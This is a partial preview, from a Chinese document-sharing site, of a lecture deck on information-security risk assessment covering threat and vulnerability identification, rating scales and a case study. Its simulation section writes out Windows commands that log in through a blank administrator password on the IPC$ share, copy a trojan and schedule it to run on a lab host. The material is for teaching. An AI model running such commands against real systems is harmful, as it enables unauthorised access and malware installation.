第5讲风险评估与测评

第5讲风险评估与测评

ID:5953331

大小:8.87 MB

页数:144页

时间:2017-11-13

第5讲风险评估与测评_第1页
第5讲风险评估与测评_第2页
第5讲风险评估与测评_第3页
第5讲风险评估与测评_第4页
第5讲风险评估与测评_第5页
资源描述:

《第5讲风险评估与测评》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、第5讲风险评估分析与测评5.1资产识别5.2威胁识别5.3脆弱性识别5.4信息安全测评方法5.5数据安全测评5.6主机安全测评5.7网络安全测评5.8应用安全测评5.9风险分析5.1资产识别略5.2威胁识别威胁(threat):指可能导致对系统或组织危害的事故潜在起因。威胁识别(threatrecognition):指分析事故潜在起因的过程。重点识别:按照资产的重要性进行排序,从而决定投入威胁识别的资源多少。5.2.1威胁分类威胁来源分类威胁分类威胁赋值(历史记录、现场取证、权威发布)5.2.2威胁识别案例分析信息环境——软环境威胁识

2、别信息环境——硬环境威胁识别公用信息载体威胁识别专用信息载体威胁识别威胁输出报告信息环境——软环境威胁识别人员资产威胁识别:欺骗威胁、窃密、权限滥用信息环境——软环境威胁识别管理制度威胁识别信息环境——硬环境威胁识别机房及保障设备威胁分类及其严重程度赋值5.2.3公用信息载体威胁识别通信设备威胁识别5.2.3公用信息载体威胁识别安全防护设备威胁识别5.2.4专用信息载体威胁识别5.2.5威胁识别输出报告5.3脆弱性识别脆弱性(vnlnerability),指可能被威胁所利用的资产或若干资产的薄弱环节。管理脆弱性大体上可以分为两类:一类

3、是结构脆弱性,即信息安全管理体系不完备。如一个组织的信息系统只有安全管理岗位,没有安全审计员岗位等。第二类是操作脆弱性,在其位不谋其政。各种管理制度虽然完整,但并没有真正得到贯彻执行。脆弱性发现:(1)谨慎挑选扫描工具(2)多方验证扫描结果(3)不要盲从扫描结论(4)既要树木又要森林5.3.1脆弱性分类5.3.2脆弱性验证(1)脆弱性的在线验证(2)脆弱性的仿真验证(3)对待脆弱性的客观态度5.3.3脆弱性赋值等级标识定义5很高如果被威胁利用,将对资产造成完全损害4高如果被威胁利用,将对资产造成重大损害3中等如果被威胁利用,将对资产造

4、成一般损害2低如果被威胁利用,将对资产造成较小损害1很低如果被威胁利用,其对资产造成的损害可以忽略5.3.4脆弱性识别案例分析以“数字兰曦”系统为例(1)网络脆弱性(2)主要系统脆弱性(3)应用系统脆弱性(4)管理脆弱性一、信息环境脆弱性识别1.软环境脆弱性识别——管理脆弱性一、信息环境脆弱性识别2.软环境脆弱性识别——人员脆弱性一、信息环境脆弱性识别3.硬环境脆弱性识别二、公用信息载体脆弱性识别1.网络平台配置脆弱性(1)“数字兰曦”子系统间VLAN存在交叉划分问题,各个子系统之间的服务器存在不同子系统服务范围划分在同一VLAN的情

5、况。该脆弱性带来的影响:根据此段漏洞扫描的结果,在此网段存在很容易让黑客利用的漏洞。如果攻击者利用一个漏洞成功控制此网段的任何一台服务器,就会对其他服务器造成非常大的威胁。(2)与“兰芯”子系统联系非常紧密的办公自动化子系统服务器放在DMZ区。该脆弱性带来的影响:为对“兰芯”子系统是非常危险的,因为DMZ区上的服务器都是外界能访问的。布此服务器能访问内网的其他服务器。这样,攻击者一旦攻破办公自动化子各系统服务器,会对“兰芯”子系统造成非常严重的威胁。二、公用信息载体脆弱性识别2.公用信息载体脆弱性三、专用信息载体脆弱性识别(1)信息欺

6、骗漏洞(CVE-2004-0786、CVE-2004-0751)。由于操作系统的安装未对Guest账户进行安全设置,攻击者可以利用空会话、Guest账户登录主机,并改变其系统的配置,造成严重后果。该脆弱性带来的影响:信息欺骗漏洞出现在“兰芯”子系统的中心服务器操作系统中,该系统属于“数字兰曦”的核心系统,如果被攻击者通过Guest账户等一些方式登录,就可以破坏系统的权限设置。(2)拒绝服务漏洞(CVE-2004-0786、CVE-2004-0751、CVE-2004-0809)。HP主机运行的Apache版本过于陈旧,低于2.0.51

7、版本,是“兰芯”子系统的一个严重隐患。该脆弱性带来的影响:拒绝服务漏洞一旦被攻击者利用,就可以停止系统中运行的Apache服务,而该系统又运行在“兰芯”子系统专用服务器上,一旦服务停止,系统将会受到严重的破坏,使用户无法访问。专用信息及信息载体脆弱性严重程度赋值四、脆弱性仿真1.“兰芯”子系统“空口令”漏洞仿真实验利用空口令登录远程主机,安装木马程序。关键命令如下:ping192.168.1.71netuse\192.168.1.71ipc$“”/user:“administrator”命令成功完成,说明是空口令copysetup

8、.exe\192.168.1.71c$复制文件到被攻击主机上nettime\192.168.1.71获取目标机上的时间信息at\192.168.1.7107:07setup.exe设定一个程序运行的时间,可以看到

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。